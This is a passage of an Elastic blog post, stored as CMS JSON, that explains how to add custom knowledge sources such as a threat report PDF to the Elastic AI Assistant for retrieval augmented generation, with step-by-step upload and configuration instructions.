sources.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere are various strategies for using custom knowledge sources with LLMs — most of which are fairly expensive or time-consuming, such as fine-tuning or instruction tuning. These models also have a short shelf life — becoming outdated pretty much the second they are generated — as we deal with new data constantly.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Search AI Platform to the rescue","_metadata":{"uid":"csf1e2dbcf8a84f405"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, we’re able to take a different approach to solve this problem for users of the Elastic AI Assistant. Being built on top of the Elastic Search AI Platform, we’re able to use a technique called retrieval augmented generation (RAG) to supplement the knowledge of LLMs with content contained within a user's Elasticsearch cluster. More importantly, we’re able to build workflows for security operations teams to use RAG in a simple, intuitive way — without the need to use external tools, code, or scripts.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis allows teams to easily bridge the gap between their private data sources and LLMs in a secure, flexible, and scalable way.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"How does it work?","_metadata":{"uid":"csf1e25cabe215769c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen additional knowledge sources are made available to the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, they can be used depending on the question a user asks. The Elastic AI Assistant is able to identify if a knowledge source needs to be referenced and searched first before handing the query off to the chosen LLM, allowing the LLM to gain the context it needs to answer the user’s question.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Elastic Search AI Platform features allow the correct content to be searched and retrieved based on the intent and semantics of the user’s question. This is important because incorrect content will lead to an LLM providing an incorrect response and sending too much content will end up being costly and ineffective. It’s also important to only retrieve data for which the user has authorized permission. Custom knowledge sources should not be considered “free for all” and should respect role-based access controls (RBAC) policies just like any other data source.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfb7673bece7ce2b9"}}},{"image":{"image":{"uid":"blt8d3ed4907aa01313","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:27:52.459Z","created_by":"bltb6c155cd84fc0c1a","file_size":"173946","filename":"Screenshot_2024-11-12_at_2.27.42_PM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-11-12 at 2.27.42 PM.png","updated_at":"2024-11-12T19:27:52.459Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.645Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8d3ed4907aa01313/6733ac3890cfa39e85fda3dd/Screenshot_2024-11-12_at_2.27.42_PM.png"},"_metadata":{"uid":"cs9509cebcf8afeb46"},"caption_l10n":"","alt_text_l10n":"elastic ai assistant - behind the scenes","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Adding knowledge sources for the Elastic AI Assistant","_metadata":{"uid":"cs439412b2fe393f3a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCustom knowledge sources can take the form of a simple text or markdown entry as well as an index that has been configured with a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-text.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic text\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e field. The new knowledge settings user interface makes the process of adding custom knowledge sources a breeze, allowing you to configure the content and the sharing settings for that knowledge.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9dd1f4bb3e2d7eec"}}},{"image":{"image":{"uid":"blt918bc805fa3bbe40","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T18:59:45.290Z","created_by":"bltb6c155cd84fc0c1a","file_size":"286816","filename":"1.png","parent_uid":null,"tags":[],"title":"1.png","updated_at":"2024-11-12T18:59:45.290Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.876Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt918bc805fa3bbe40/6733a5a1568ada3b1b4e1730/1.png"},"_metadata":{"uid":"csd864815a8b68a328"},"caption_l10n":"","alt_text_l10n":"security AI settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt3a1cd22957da450d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T18:59:52.016Z","created_by":"bltb6c155cd84fc0c1a","file_size":"395937","filename":"2.png","parent_uid":null,"tags":[],"title":"2.png","updated_at":"2024-11-12T18:59:52.016Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.813Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3a1cd22957da450d/6733a5a8a6bfe73fea9c156f/2.png"},"_metadata":{"uid":"cse532c31a8f99fc45"},"caption_l10n":"","alt_text_l10n":"new doc entry flyout","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs96d0831bb6e8fef3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn addition, users can now ask \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to remember content as knowledge during a conversation. Simply ask the Elastic AI Assistant what you would like remembered, and it will be available as a custom knowledge source going forward.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSome examples of how custom knowledge sources can be used:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAttaching an index containing asset information, such as content found in a configuration management database (CMDB)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdding your favorite threat intelligence reports to be used during a conversation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDocuments containing any existing threat hunting playbooks or standard operating procedures\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHistorical incident or case information\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOn-call schedules\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Examples","_metadata":{"uid":"csb97e98cb2887b36f"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Adding a threat intelligence report PDF as custom knowledge","_metadata":{"uid":"csf4b82cf94c0e6bb7"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSecurity operations teams often maintain repositories of threat intelligence reports that contain a wealth of knowledge from the vendor producing the report. The challenge, however, is that the content of these reports typically sits in PDFs, making it difficult to retrieve and reference relevant information from the report during an incident or investigation or leverage any indicators of compromise (IoCs) for threat hunting. With the ability to use these reports as knowledge within the Elastic AI Assistant, this dynamic changes entirely.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet’s use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/security/report/global-threat-report?device=c\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Global Threat Report for 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as an example.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 1. Enabling and setting up the knowledge base\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThis is a very simple step that takes care of some of the prerequisites necessary for the knowledge base content to be used by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. It’s a single button in the assistant management settings. The process only takes a few minutes to complete.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csefae42ab767f1ae7"}}},{"image":{"image":{"uid":"blt5a410a5e3d5739b6","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T18:59:58.286Z","created_by":"bltb6c155cd84fc0c1a","file_size":"109601","filename":"3.png","parent_uid":null,"tags":[],"title":"3.png","updated_at":"2024-11-12T18:59:58.286Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.767Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5a410a5e3d5739b6/6733a5aee71e4970c4f0ff53/3.png"},"_metadata":{"uid":"cseab0a8841da8baa2"},"caption_l10n":"","alt_text_l10n":"Step 1. Enabling and setting up the knowledge base","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5627788244495caa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 2. Uploading the PDF\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eOnce the knowledge base setup is complete, we can proceed to upload the PDF. To do this, we can use the integration titled \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUpload a file\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e from the Integrations page.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb65b3ce226a12d92"}}},{"image":{"image":{"uid":"blt679b7228db69e53c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:04.143Z","created_by":"bltb6c155cd84fc0c1a","file_size":"218839","filename":"4.png","parent_uid":null,"tags":[],"title":"4.png","updated_at":"2024-11-12T19:00:04.143Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.692Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt679b7228db69e53c/6733a5b4a72f994c8e3f9dab/4.png"},"_metadata":{"uid":"cs3d6b4ad5d682e3aa"},"caption_l10n":"","alt_text_l10n":"Step 2. Uploading the PDF","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs61126d48d6984c4a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can select the PDF from the next screen.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5a29c5c5661cc56f"}}},{"image":{"image":{"uid":"bltf3e1ce014e65819c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:10.081Z","created_by":"bltb6c155cd84fc0c1a","file_size":"234968","filename":"5.png","parent_uid":null,"tags":[],"title":"5.png","updated_at":"2024-11-12T19:00:10.081Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.662Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf3e1ce014e65819c/6733a5ba7ca8e8ff29488948/5.png"},"_metadata":{"uid":"cs7410f3edd2373e36"},"caption_l10n":"","alt_text_l10n":"more ways to add data","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse9d8558d4281bb35"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eClick \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImport\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e when prompted.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0d657489f9d95887"}}},{"image":{"image":{"uid":"blt6664d7172e7c030f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:16.242Z","created_by":"bltb6c155cd84fc0c1a","file_size":"176420","filename":"6.png","parent_uid":null,"tags":[],"title":"6.png","updated_at":"2024-11-12T19:00:16.242Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.946Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6664d7172e7c030f/6733a5c0824c1a5c8c8db030/6.png"},"_metadata":{"uid":"cs44180c5210889349"},"caption_l10n":"","alt_text_l10n":"elastic-global-threat-report-pdf","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdae881e9660eb7a4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor the next step, we will need to pivot to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdvanced\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e tab. Once uploaded, this PDF will live in its own index, so feel free to name the index accordingly. There is no need to create a data view.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse9bc4b49327a1e48"}}},{"image":{"image":{"uid":"blt70a3db653a99296a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:22.153Z","created_by":"bltb6c155cd84fc0c1a","file_size":"138729","filename":"7.png","parent_uid":null,"tags":[],"title":"7.png","updated_at":"2024-11-12T19:00:22.153Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.851Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt70a3db653a99296a/6733a5c688bc783b6c599766/7.png"},"_metadata":{"uid":"cs2f28f8176e2afb33"},"caption_l10n":"","alt_text_l10n":"advanced tab","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7cf4b0400f0083b0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere is one last step before clicking on the import button. We need to add a semantic text field. This allows the assistant to retrieve the correct information from the report.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eClick on \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdd additional field\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and then \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdd semantic text field\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9733984f1b5daaaf"}}},{"image":{"image":{"uid":"blt0452352ff82ff7b2","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:28.778Z","created_by":"bltb6c155cd84fc0c1a","file_size":"138119","filename":"8.png","parent_uid":null,"tags":[],"title":"8.png","updated_at":"2024-11-12T19:00:28.778Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.780Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0452352ff82ff7b2/6733a5cc53e3c46952b3bd92/8.png"},"_metadata":{"uid":"cs67f059c1491d21ab"},"caption_l10n":"","alt_text_l10n":"add additional field","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs95b910906e8cb345"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can leave the default settings that appear after clicking \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdd semantic text field\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse7fd03cbf008c841"}}},{"image":{"image":{"uid":"blte46fa3a9de840795","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:35.350Z","created_by":"bltb6c155cd84fc0c1a","file_size":"226773","filename":"9.png","parent_uid":null,"tags":[],"title":"9.png","updated_at":"2024-11-12T19:00:35.350Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.707Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte46fa3a9de840795/6733a5d3252d98c423a0862d/9.png"},"_metadata":{"uid":"csbdb963bb8ca3643a"},"caption_l10n":"","alt_text_l10n":"Add semantic text field","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf93b3d1076607d64"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can now click on \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImport\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscb4a4f25602ea101"}}},{"image":{"image":{"uid":"bltf32013887669b2a8","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:42.354Z","created_by":"bltb6c155cd84fc0c1a","file_size":"65208","filename":"10.png","parent_uid":null,"tags":[],"title":"10.png","updated_at":"2024-11-12T19:00:42.354Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:01.045Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf32013887669b2a8/6733a5dafeb8f90debebe109/10.png"},"_metadata":{"uid":"cs70646c4276ebfed0"},"caption_l10n":"","alt_text_l10n":"import","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0e870ec13473a0bf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen the file is imported successfully, you should see the following status:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse1af01ed57181581"}}},{"image":{"image":{"uid":"blta77b151089fb7a50","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:48.480Z","created_by":"bltb6c155cd84fc0c1a","file_size":"97844","filename":"11.png","parent_uid":null,"tags":[],"title":"11.png","updated_at":"2024-11-12T19:00:48.480Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.960Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta77b151089fb7a50/6733a5e0188be3427bf079cf/11.png"},"_metadata":{"uid":"cs676db352b101ef58"},"caption_l10n":"","alt_text_l10n":"import successfully","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csa4b4f22f6aef54cb"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eIt’s important to note that while we used the File Upload user interface to add this PDF, it’s possible to automate this functionality as part of any ingest process using the \u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/attachment.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eattachment processor\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs25d9dd13e67e7a45"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 3. Adding the PDF index as custom knowledge\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eReturning to the AI Settings page, select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNew\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to add a new knowledge entry, and then select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIndex\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e from the list.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9e5324cb34dbd64e"}}},{"image":{"image":{"uid":"bltca78d8d11b032355","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:00:55.781Z","created_by":"bltb6c155cd84fc0c1a","file_size":"122897","filename":"12.png","parent_uid":null,"tags":[],"title":"12.png","updated_at":"2024-11-12T19:00:55.781Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.863Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltca78d8d11b032355/6733a5e777c00df125a143c1/12.png"},"_metadata":{"uid":"cs28c7c5a2ec650811"},"caption_l10n":"","alt_text_l10n":"new index","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5dbde1934fde0a66"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou’ll then be asked to select the index that was just created (“global-threat-report-kb” in our example), the semantic text field we just created (content), and a description of how and when the assistant should use this knowledge. This should be a simple sentence description of what the data is and when and how it should be queried. You can also set the relevant permissions for this knowledge entry from this view. When ready, hit \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSave\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2523981c50378ec6"}}},{"image":{"image":{"uid":"blt7a24db65cdc5cf4f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:08:25.159Z","created_by":"bltb6c155cd84fc0c1a","file_size":"300453","filename":"13.png","parent_uid":null,"tags":[],"title":"13.png","updated_at":"2024-11-12T19:08:25.159Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.797Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7a24db65cdc5cf4f/6733a7a99f35ca1787c84317/13.png"},"_metadata":{"uid":"cs12fbb674b22b9422"},"caption_l10n":"","alt_text_l10n":"edit index entry","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2408f9c9ad270efa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce added, you should see the new knowledge entry in the list:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3659a8457087b369"}}},{"image":{"image":{"uid":"blt7564b4c68547a48f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:08:40.734Z","created_by":"bltb6c155cd84fc0c1a","file_size":"99258","filename":"14.png","parent_uid":null,"tags":[],"title":"14.png","updated_at":"2024-11-12T19:08:40.734Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.753Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7564b4c68547a48f/6733a7b83dfab3515cf581e1/14.png"},"_metadata":{"uid":"cscdbfe05ab866fce8"},"caption_l10n":"","alt_text_l10n":"new knowledge entry list","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs08b5b9418267b3f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe threat report is now available as knowledge and is ready to be used by the assistant.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eComparing the results\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eIf we compare results from the assistant before and after we add the knowledge base entry, we can see a clear difference.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBefore\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e the knowledge was added:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa133a45d3aacf803"}}},{"image":{"image":{"uid":"blt10b9bab8961d5bf1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:08:48.795Z","created_by":"bltb6c155cd84fc0c1a","file_size":"249332","filename":"15.png","parent_uid":null,"tags":[],"title":"15.png","updated_at":"2024-11-12T19:08:48.795Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:01.057Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt10b9bab8961d5bf1/6733a7c097ce06deea479257/15.png"},"_metadata":{"uid":"csef75a2f11725bac6"},"caption_l10n":"","alt_text_l10n":"AI assistant – before","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs69e0a4459ebd3948"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAfter\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e the knowledge was added:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs88aa3d9daf244220"}}},{"image":{"image":{"uid":"blt5ffbb1b4d8ae4430","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-12T19:09:11.933Z","created_by":"bltb6c155cd84fc0c1a","file_size":"544965","filename":"16.png","parent_uid":null,"tags":[],"title":"16.png","updated_at":"2024-11-12T19:09:11.933Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.974Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5ffbb1b4d8ae4430/6733a7d7d01b2ce2368eba58/16.png"},"_metadata":{"uid":"cse9d017656ba71395"},"caption_l10n":"","alt_text_l10n":"AI assistant – after","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1d1dee4af249e7f7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur PDF went from being an idle bit of important — yet hard-to-use — information to being immediately accessible to our security operations team. The great thing about knowledge sources is that the Elastic AI Assistant is able to use a combination of them, depending on the questions asked. Remember that the Elastic AI Assistant can also ingest 500 of your latest alerts as knowledge by default, which allows for a powerful combination of questions that can be 